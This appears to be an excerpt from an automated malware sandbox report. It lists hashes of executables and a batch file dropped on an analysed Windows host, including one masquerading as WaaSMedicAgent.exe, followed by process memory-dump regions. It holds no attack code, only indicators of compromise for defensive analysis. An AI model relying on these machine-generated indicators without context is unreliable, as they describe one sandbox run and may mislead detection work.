C:\Users\Admin\AppData\Local\Temp\yfXLZxBfsx.batMD5
9f8f286b72aba0d6337cc37e0b0891c9
SHA15af9142a6a4b004d4e0692ed0a822d67163b4008
SHA2566626782257f1394967c873ad47d31d9da8772f3e2f58f7856a0edc0d6d6cb356
SHA5129228329eda8320f96eb89d25ba1a2dc00d5217dcfe9deda7440bca90eff1a859158544b9d393698f238b59dc9614ebf659be359041836453bca3dca86a492572
-
C:\Users\Admin\Documents\4_yza4q88bogYk_cF59XJjyz.exeMD5
5db4e7f04bb163a1337f216ee2076568
SHA1d1f09aadd4d7583c18a5dbe889477179718de362
SHA25612cdcdee943f989fc68b7781176572822605b5ace00dcdb445e58e6bf60c9a5a
SHA5122b14db4807294180165c472a16fcb1ce4fd156165d760b6d0c6eb176e8775e67097db629a88c66ec1ff69e31772455e7957beea20f2288b03647f5134de83263
-
C:\Users\Admin\Documents\4_yza4q88bogYk_cF59XJjyz.exeMD5
5db4e7f04bb163a1337f216ee2076568
SHA1d1f09aadd4d7583c18a5dbe889477179718de362
SHA25612cdcdee943f989fc68b7781176572822605b5ace00dcdb445e58e6bf60c9a5a
SHA5122b14db4807294180165c472a16fcb1ce4fd156165d760b6d0c6eb176e8775e67097db629a88c66ec1ff69e31772455e7957beea20f2288b03647f5134de83263
-
C:\Users\Admin\Documents\5RLR8rS_aMkp6xiTBY96V6aV.exeMD5
a4cbfe98a432378d938d3772d89e8f8a
SHA137ea0a7524b90a0a239636fc544cfefe2d829999
SHA256c2c0bcef434f8f91ccf5816e53931838faea22f53cd317bf27cfca8bc0a99b5c
SHA5125e112a920bf118e5b3ddfb6356b030f788d643a9c9ec2dd21075999193313c87ca5bda0a37d448feaf3cf778cf3babbcbc73790e87710d28ceb6c07482d96500
-
C:\Users\Admin\Documents\5RLR8rS_aMkp6xiTBY96V6aV.exeMD5
a4cbfe98a432378d938d3772d89e8f8a
SHA137ea0a7524b90a0a239636fc544cfefe2d829999
SHA256c2c0bcef434f8f91ccf5816e53931838faea22f53cd317bf27cfca8bc0a99b5c
SHA5125e112a920bf118e5b3ddfb6356b030f788d643a9c9ec2dd21075999193313c87ca5bda0a37d448feaf3cf778cf3babbcbc73790e87710d28ceb6c07482d96500
-
C:\Users\Admin\Documents\8zeYyAhCLyy4MXuHDcnSZuq6.exeMD5
53c1dc18657ab07de3c6ae7776b7bf39
SHA13ddfe3709a2b299a3e0dba866516734ee4b23275
SHA2567b21188396d28d8de129de2a44042a4d57b42afcb6fd826628e8b6637b071f89
SHA512ae2edf1375756add690656f78c60cd0785afa6beea30c8070dd2be6762033ec0f3ed11e4006b11ef3a42b7db75de46cfefba3810f5a7054825dc766dd2b649da
-
C:\Users\Admin\Documents\8zeYyAhCLyy4MXuHDcnSZuq6.exeMD5
53c1dc18657ab07de3c6ae7776b7bf39
SHA13ddfe3709a2b299a3e0dba866516734ee4b23275
SHA2567b21188396d28d8de129de2a44042a4d57b42afcb6fd826628e8b6637b071f89
SHA512ae2edf1375756add690656f78c60cd0785afa6beea30c8070dd2be6762033ec0f3ed11e4006b11ef3a42b7db75de46cfefba3810f5a7054825dc766dd2b649da
-
C:\Users\Admin\Documents\8zeYyAhCLyy4MXuHDcnSZuq6.exeMD5
53c1dc18657ab07de3c6ae7776b7bf39
SHA13ddfe3709a2b299a3e0dba866516734ee4b23275
SHA2567b21188396d28d8de129de2a44042a4d57b42afcb6fd826628e8b6637b071f89
SHA512ae2edf1375756add690656f78c60cd0785afa6beea30c8070dd2be6762033ec0f3ed11e4006b11ef3a42b7db75de46cfefba3810f5a7054825dc766dd2b649da
-
C:\Users\Admin\Documents\ETuSLYkVQqOjTT_usPKsVG0_.exeMD5
430a6410a38c00c751dc2f0981c7e65c
SHA1546ef76dbc37583bb6185bfa8804995f6fab7c36
SHA2569b12833483586a2f7ea1a1f2236948ae760f90011e601e0320d46716c3ea44fe
SHA51217bf583912724d331862a5bbf2281840fe4b5947e4308a761028c8af8cd1a8999502f1e661bdf3f194c98746828b545b374ec9b97735fd68f3a451ba29bb0e47
-
C:\Users\Admin\Documents\ETuSLYkVQqOjTT_usPKsVG0_.exeMD5
430a6410a38c00c751dc2f0981c7e65c
SHA1546ef76dbc37583bb6185bfa8804995f6fab7c36
SHA2569b12833483586a2f7ea1a1f2236948ae760f90011e601e0320d46716c3ea44fe
SHA51217bf583912724d331862a5bbf2281840fe4b5947e4308a761028c8af8cd1a8999502f1e661bdf3f194c98746828b545b374ec9b97735fd68f3a451ba29bb0e47
-
C:\Users\Admin\Documents\HZ0653dQL6eKaM3PHHhKvs1i.exeMD5
ab5e336df7219dc233029967e7c13ff4
SHA15e3e4f57e0bf96d3443cfa8637672b39a0676b36
SHA2563791c99cca719add78fbfffd3f54f3440596f7a99c8e2a76fee25d3cdbd1271d
SHA512812c346ab88c597307b2fa2fa3db07fe7862f15bbdff8a44f9d390fd58f1120301801d0b02e0dc5f62d62958bc1f71947089201dfafef52cbc4dba4807ea374a
-
C:\Users\Admin\Documents\HZ0653dQL6eKaM3PHHhKvs1i.exeMD5
ab5e336df7219dc233029967e7c13ff4
SHA15e3e4f57e0bf96d3443cfa8637672b39a0676b36
SHA2563791c99cca719add78fbfffd3f54f3440596f7a99c8e2a76fee25d3cdbd1271d
SHA512812c346ab88c597307b2fa2fa3db07fe7862f15bbdff8a44f9d390fd58f1120301801d0b02e0dc5f62d62958bc1f71947089201dfafef52cbc4dba4807ea374a
-
C:\Users\Admin\Documents\hO5xKfTb0uXbbkS86n6An9zN.exeMD5
8446d7818c5a7fff6839fe4be176f88e
SHA1b094ebde855d752565f9fce2ddfb93b264060904
SHA256c83b17d316e93347d1a282646c5eb340662c9a51e38f7ea4a233f8f23fe59652
SHA512f10e7c5bdf076278c678a860b413774a930996211dcd0dee96b323d56761207a08e7da5ffdaa33dc3a1f03738aad86cf855f48d8b70c72ff8b796ace3eb6c42d
-
C:\Users\Admin\Documents\hO5xKfTb0uXbbkS86n6An9zN.exeMD5
8446d7818c5a7fff6839fe4be176f88e
SHA1b094ebde855d752565f9fce2ddfb93b264060904
SHA256c83b17d316e93347d1a282646c5eb340662c9a51e38f7ea4a233f8f23fe59652
SHA512f10e7c5bdf076278c678a860b413774a930996211dcd0dee96b323d56761207a08e7da5ffdaa33dc3a1f03738aad86cf855f48d8b70c72ff8b796ace3eb6c42d
-
C:\Users\WaaSMedicAgent.exeMD5
53c1dc18657ab07de3c6ae7776b7bf39
SHA13ddfe3709a2b299a3e0dba866516734ee4b23275
SHA2567b21188396d28d8de129de2a44042a4d57b42afcb6fd826628e8b6637b071f89
SHA512ae2edf1375756add690656f78c60cd0785afa6beea30c8070dd2be6762033ec0f3ed11e4006b11ef3a42b7db75de46cfefba3810f5a7054825dc766dd2b649da
-
C:\Windows\SysWOW64\uefifces\ezokegez.exeMD5
3a940ddd03f329ad6dbd65535651e6b1
SHA12983e680bd6264e0d700f12a802b57ac14936d99
SHA256757c64e8640e8bc0774a99797896a108613054d86c816288c4a59703aacab159
SHA512acce5f763c023e5082a133dbd819188c63178f5c7f3942cfb2c10d36e82eedd7dcae708a0bc56d9454531cd44c8d7d8d40db849822106e9d860039474ffb8732
-
memory/1328-297-0x0000000000748000-0x00000000007B4000-memory.dmpFilesize
432KB
-
memory/1368-315-0x0000000003C30000-0x0000000003D70000-memory.dmpFilesize
1.2MB
-
memory/1368-353-0x0000000003C30000-0x0000000003D70000-memory.dmpFilesize
1.2MB
-
memory/1368-241-0x0000000000400000-0x0000000000629000-memory.dmpFilesize
2.2MB
-
memory/1368-351-0x0000000003C30000-0x0000000003D70000-memory.dmpFilesize
1.2MB
-
memory/1368-284-0x0000000003070000-0x0000000003A9B000-memory.dmpFilesize
10.2MB
-
memory/1368-313-0x0000000003C00000-0x0000000003C01000-memory.dmpFilesize
4KB
-
memory/1368-318-0x0000000003C10000-0x0000000003C11000-memory.dmpFilesize
4KB
-
memory/1368-244-0x0000000077B70000-0x0000000077D13000-memory.dmpFilesize
1.6MB
-
memory/1368-317-0x0000000003C30000-0x0000000003D70000-memory.dmpFilesize
1.2MB
-
memory/1368-238-0x0000000000400000-0x0000000000629000-memory.dmpFilesize
2.2MB
-
memory/1368-307-0x0000000003BF0000-0x0000000003BF1000-memory.dmpFilesize
4KB
-
memory/1368-309-0x0000000003070000-0x0000000003A9B000-memory.dmpFilesize
10.2MB
-
memory/1368-321-0x0000000002270000-0x0000000002271000-memory.dmpFilesize
4KB
-
memory/1368-319-0x0000000003C30000-0x0000000003D70000-memory.dmpFilesize
1.2MB
-
memory/1368-320-0x0000000003C30000-0x0000000003D70000-memory.dmpFilesize
1.2MB
-
memory/1368-240-0x00000000024A0000-0x00000000026BD000-memory.dmpFilesize
2.1MB
-
memory/1368-239-0x00000000023B7000-0x0000000002493000-memory.dmpFilesize
880KB
-
memory/1420-263-0x0000000000535000-0x0000000000542000-memory.dmpFilesize
52KB
-
memory/1420-271-0x0000000000535000-0x0000000000542000-memory.dmpFilesize
52KB
-
memory/1600-322-0x0000000074470000-0x00000000744BC000-memory.dmpFilesize
304KB
-
memory/1600-301-0x0000000072140000-0x00000000721C9000-memory.dmpFilesize
548KB
-
memory/1600-295-0x0000000077940000-0x0000000077B55000-memory.dmpFilesize
2.1MB
-
memory/1600-316-0x0000000076930000-0x0000000076EE3000-memory.dmpFilesize
5.7MB
-
memory/1600-293-0x0000000000F20000-0x0000000000F21000-memory.dmpFilesize
4KB
-
memory/1660-187-0x0000000004510000-0x0000000004519000-memory.dmpFilesize
36KB
-
memory/1660-186-0x00000000044C0000-0x00000000044C8000-memory.dmpFilesize
32KB
-
memory/1660-191-0x0000000000400000-0x00000000043D0000-memory.dmpFilesize
63.8MB
-
memory/2072-214-0x0000000006620000-0x0000000006BC4000-memory.dmpFilesize
5.6MB
-
memory/2072-217-0x00000000736B0000-0x0000000073E60000-memory.dmpFilesize
7.7MB
-
memory/2072-221-0x0000000006200000-0x0000000006250000-memory.dmpFilesize
320KB
-
memory/2072-220-0x0000000003240000-0x0000000003241000-memory.dmpFilesize
4KB
-
memory/2072-211-0x0000000000100000-0x000000000053E000-memory.dmpFilesize
4.2MB
-
memory/2072-227-0x0000000007100000-0x000000000762C000-memory.dmpFilesize
5.2MB
-
memory/2072-228-0x0000000006BD0000-0x0000000006C36000-memory.dmpFilesize
408KB
-
memory/2120-215-0x00007FFC07610000-0x00007FFC080D1000-memory.dmpFilesize
10.8MB
-
memory/2120-210-0x00000000008C0000-0x00000000008E6000-memory.dmpFilesize
152KB
-
memory/2120-219-0x000000001CC70000-0x000000001CC72000-memory.dmpFilesize
8KB
-
memory/2548-268-0x0000000000730000-0x0000000000745000-memory.dmpFilesize
84KB
-
memory/2940-178-0x0000000000850000-0x00000000008B4000-memory.dmpFilesize
400KB
-
memory/2940-180-0x00000000736B0000-0x0000000073E60000-memory.dmpFilesize
7.7MB
-
memory/3020-216-0x0000000001160000-0x0000000001176000-memory.dmpFilesize
88KB
-
memory/3192-201-0x00000000736B0000-0x0000000073E60000-memory.dmpFilesize
7.7MB
-
memory/3192-198-0x0000000005730000-0x0000000005742000-memory.dmpFilesize
72KB
-
memory/3192-196-0x0000000005CC0000-0x00000000062D8000-memory.dmpFilesize
6.1MB
-
memory/3192-194-0x0000000000400000-0x000000000041E000-memory.dmpFilesize
120KB
-
memory/3192-207-0x0000000005A40000-0x0000000005B4A000-memory.dmpFilesize
1.0MB
-
memory/3192-202-0x00000000056A0000-0x0000000005CB8000-memory.dmpFilesize
6.1MB
-
memory/3192-200-0x0000000005790000-0x00000000057CC000-memory.dmpFilesize
240KB
-
memory/3528-199-0x0000000000400000-0x000000000442B000-memory.dmpFilesize
64.2MB
-
memory/3528-192-0x0000000004480000-0x00000000044E4000-memory.dmpFilesize
400KB
-
memory/3528-193-0x0000000004830000-0x00000000048CD000-memory.dmpFilesize
628KB
-
memory/3532-147-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/3532-146-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/3532-152-0x000000006B280000-0x000000006B2A6000-memory.dmpFilesize
152KB
-
memory/3532-153-0x0000000000400000-0x000000000051E000-memory.dmpFilesize
1.1MB
-
memory/3532-155-0x0000000000400000-0x000000000051E000-memory.dmpFilesize
1.1MB
-
memory/3532-154-0x0000000000400000-0x000000000051E000-memory.dmpFilesize
1.1MB
-
memory/3532-156-0x0000000000400000-0x000000000051E000-memory.dmpFilesize
1.1MB
-
memory/3532-157-0x0000000000400000-0x000000000051E000-memory.dmpFilesize
1.1MB
-
memory/3532-145-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/3532-158-0x0000000000400000-0x000000000051E000-memory.dmpFilesize
1.1MB
-
memory/3532-173-0x0000000000400000-0x000000000051E000-memory.dmpFilesize
1.1MB
-
memory/3532-176-0x000000006B280000-0x000000006B2A6000-memory.dmpFilesize
152KB
-
memory/3532-174-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/3532-177-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/3532-150-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/3532-179-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/3532-148-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/3532-149-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/3532-151-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/3700-181-0x000000001CED0000-0x000000001CED2000-memory.dmpFilesize
8KB
-
memory/3700-175-0x00000000009E0000-0x0000000000A12000-memory.dmpFilesize
200KB
-
memory/3700-182-0x00007FFC079A0000-0x00007FFC08461000-memory.dmpFilesize
10.8MB
-
memory/4148-304-0x000000000052D000-0x0000000000554000-memory.dmpFilesize
156KB
-
memory/4200-229-0x00000000736B0000-0x0000000073E60000-memory.dmpFilesize
7.7MB
-
memory/4200-230-0x0000000005990000-0x0000000005991000-memory.dmpFilesize
4KB
-
memory/4200-224-0x0000000000E30000-0x0000000000E48000-memory.dmpFilesize
96KB
-
memory/4252-242-0x0000000000588000-0x0000000000596000-memory.dmpFilesize
56KB
-
memory/4252-245-0x0000000000400000-0x0000000000470000-memory.dmpFilesize
448KB
-
memory/4252-231-0x0000000000588000-0x0000000000596000-memory.dmpFilesize
56KB
-
memory/4252-243-0x00000000004E0000-0x00000000004F3000-memory.dmpFilesize
76KB
-
memory/4336-234-0x0000000000BE0000-0x0000000000C1E000-memory.dmpFilesize
248KB
-
memory/4336-235-0x00007FFC07610000-0x00007FFC080D1000-memory.dmpFilesize
10.8MB
-
memory/4336-237-0x000000001CEA0000-0x000000001CEF0000-memory.dmpFilesize
320KB
-
memory/4336-236-0x000000001CEF0000-0x000000001CEF2000-memory.dmpFilesize
8KB
-
memory/4548-266-0x0000000000100000-0x000000000053E000-memory.dmpFilesize
4.2MB
-
memory/4548-267-0x0000000000100000-0x000000000053E000-memory.dmpFilesize
4.2MB
-
memory/4636-258-0x0000000001320000-0x0000000001323000-memory.dmpFilesize
12KB
-
memory/4636-257-0x0000000001310000-0x0000000001313000-memory.dmpFilesize
12KB
-
memory/4636-254-0x00000000012E0000-0x00000000012E3000-memory.dmpFilesize
12KB
-
memory/4636-253-0x00000000012D0000-0x00000000012D3000-memory.dmpFilesize
12KB
-
memory/4636-251-0x00000000012B0000-0x00000000012B3000-memory.dmpFilesize
12KB
-
memory/4636-248-0x00000000012A0000-0x00000000012A3000-memory.dmpFilesize
12KB
-
memory/4636-249-0x0000000077B70000-0x0000000077D13000-memory.dmpFilesize
1.6MB
-
memory/4636-256-0x0000000001300000-0x0000000001303000-memory.dmpFilesize
12KB
-
memory/4636-252-0x00000000012C0000-0x00000000012C3000-memory.dmpFilesize
12KB
-
memory/4636-255-0x00000000012F0000-0x00000000012F3000-memory.dmpFilesize
12KB
-
memory/4636-250-0x00000000774D0000-0x0000000077670000-memory.dmpFilesize
1.6MB
-
memory/4636-259-0x0000000001330000-0x0000000001333000-memory.dmpFilesize
12KB
-
memory/4636-261-0x0000000001350000-0x0000000001353000-memory.dmpFilesize
12KB
-
memory/4636-260-0x0000000001340000-0x0000000001343000-memory.dmpFilesize
12KB
-
memory/5696-355-0x0000000010000000-0x0000000010D56000-memory.dmpFilesize
13.3MB
-
memory/5824-340-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/5824-341-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/5824-344-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB